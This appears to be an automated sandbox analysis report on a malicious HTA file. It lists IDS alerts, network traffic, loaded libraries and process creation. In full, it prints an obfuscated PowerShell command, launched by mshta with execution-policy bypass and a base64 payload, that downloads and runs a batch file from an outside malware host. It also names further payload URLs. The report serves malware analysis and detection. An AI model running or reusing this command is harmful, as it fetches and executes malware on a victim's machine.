C:\Windows\SysWOW64\mshta.exe, ParentProcessId: 6980, ParentProcessName: mshta.exe, ProcessCommandLine: "C:\Windows\System32\WindowsP

Suricata Signatures

TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
2025-01-12T15:36:16.173975+010018100002Potentially Bad Traffic192.168.2.449732193.26.115.39443TCP

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

barindex
Antivirus detection for URL or domain
Source: https://candwfarmsllc.com/c2.batAvira URL Cloud: Label: malware
AI detected suspicious sample
Source: Submited SampleIntegrated Neural Analysis Model: Matched 92.4% probability
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1724014586.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb\ source: powershell.exe, 00000002.00000002.1729801596.00000000073F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdbJN source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdb%N; source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp
Source: Joe Sandbox ViewIP Address: 193.26.115.39 193.26.115.39
Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
Source: Network trafficSuricata IDS: 1810000 - Severity 2 - Joe Security ANOMALY Windows PowerShell HTTP activity : 192.168.2.4:49732 -> 193.26.115.39:443
Source: global trafficHTTP traffic detected: GET /c2.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: candwfarmsllc.comConnection: Keep-Alive
Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
Source: global trafficHTTP traffic detected: GET /c2.bat HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682Host: candwfarmsllc.comConnection: Keep-Alive
Source: global trafficDNS traffic detected: DNS query: candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1724014586.0000000002ABB000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micro.
Source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.microsoft
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
Source: powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
Source: powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore6lB
Source: powershell.exe, 00000002.00000002.1725181510.0000000004A95000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com
Source: powershell.exe, 00000002.00000002.1725181510.0000000004B19000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1725181510.0000000004811000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com/c2.bat=
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://candwfarmsllc.com/c2.bat=https://candwfarmsllc.com/c2.bat
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
Source: powershell.exe, 00000002.00000002.1725181510.0000000004966000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
Source: powershell.exe, 00000002.00000002.1725181510.000000000516D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://go.micro
Source: powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/W2.pdf
Source: powershell.exe, 00000002.00000002.1725181510.0000000004AF2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000002.00000002.1725181510.0000000004B13000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://myguyapp.com/msword.zip
Source: powershell.exe, 00000002.00000002.1728019159.0000000005878000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49732
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownHTTPS traffic detected: 193.26.115.39:443 -> 192.168.2.4:49732 version: TLS 1.2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047AA3EC2_2_047AA3EC
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047AAF282_2_047AAF28
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047A26972_2_047A2697
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047A205D2_2_047A205D
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047A0BD52_2_047A0BD5
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047AB9ED2_2_047AB9ED
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\App Paths\OUTLOOK.EXEJump to behavior
Source: classification engineClassification label: mal68.evad.winHTA@4/3@1/1
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:180:120:WilError_03
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fsz3rn25.k5e.ps1Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: unknownProcess created: C:\Windows\SysWOW64\mshta.exe mshta.exe "C:\Users\user\Desktop\c2.hta"
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcA
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -NoProfile -EncodedCommand WwBOAGUAdAAuAFMAZQByAHYAaQBjAGUAUABvAGkAbgB0AE0AYQBuAGEAZwBlAHIAXQA6ADoAUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbAAgAD0AIABbAE4AZQB0AC4AUwBlAGMAdQByAGkAdAB5AFAAcgBvAHQAbwBjAG8AbABUAHkAcABlAF0AOgA6AFQAbABzADEAMgA7AA0ACgBoAHQAdABwAHMAOgAvAC8AYwBhAG4AZAB3AGYAYQByAG0AcwBsAGwAYwAuAGMAbwBtAC8AYwAyAC4AYgBhAHQAPQAnAGgAdAB0AHAAcwA6AC8ALwBjAGEAbgBkAHcAZgBhAHIAbQBzAGwAbABjAC4AYwBvAG0ALwBjADIALgBiAGEAdAAnADsADQAKAEMAOgBcAFUAcwBlAHIAcwBcAGEAcwBhAG8AbABcAEEAcABwAEQAYQB0AGEAXABMAG8AYwBhAGwAXABUAGUAbQBwAFwAYwAyAC4AYgBhAHQAPQBDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcAAgACsAIAAnAFwAYwAyAC4AYgBhAHQAJwA7AA0ACgBJAG4AdgBvAGsAZQAtAFcAZQBiAFIAZQBxAHUAZQBzAHQAIAAtAFUAcgBpACAAaAB0AHQAcABzADoALwAvAGMAYQBuAGQAdwBmAGEAcgBtAHMAbABsAGMALgBjAG8AbQAvAGMAMgAuAGIAYQB0ACAALQBPAHUAdABGAGkAbABlACAAQwA6AFwAVQBzAGUAcgBzAFwAYQBzAGEAbwBsAFwAQQBwAHAARABhAHQAYQBcAEwAbwBjAGEAbABcAFQAZQBtAHAAXABjADIALgBiAGEAdAA7AA0ACgBTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIABDADoAXABVAHMAZQByAHMAXABhAHMAYQBvAGwAXABBAHAAcABEAGEAdABhAFwATABvAGMAYQBsAFwAVABlAG0AcABcAGMAMgAuAGIAYQB0ACAALQBOAG8ATgBlAHcAVwBpAG4AZABvAHcAJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32Jump to behavior
Source: C:\Windows\SysWOW64\mshta.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\SettingsJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
Source: Binary string: CallSite.Target.pdb source: powershell.exe, 00000002.00000002.1724014586.0000000002ABB000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \??\C:\Windows\Microsoft.Net\assembly\GAC_32\mscorlib\v4.0_4.0.0.0__b77a5c561934e089\mscorlib.pdb\ source: powershell.exe, 00000002.00000002.1729801596.00000000073F6000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: dows\dll\mscorlib.pdbJN source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: \mscorlib.pdb%N; source: powershell.exe, 00000002.00000002.1730075991.000000000745A000.00000004.00000020.00020000.00000000.sdmp
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047A1DC3 pushad ; ret 2_2_047A1DE2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047A1D93 pushad ; ret 2_2_047A1DA2
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047A1D83 pushad ; ret 2_2_047A1D92
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 2_2_047A3805 push ss; ret 2_2_047A380A
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\mshta.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
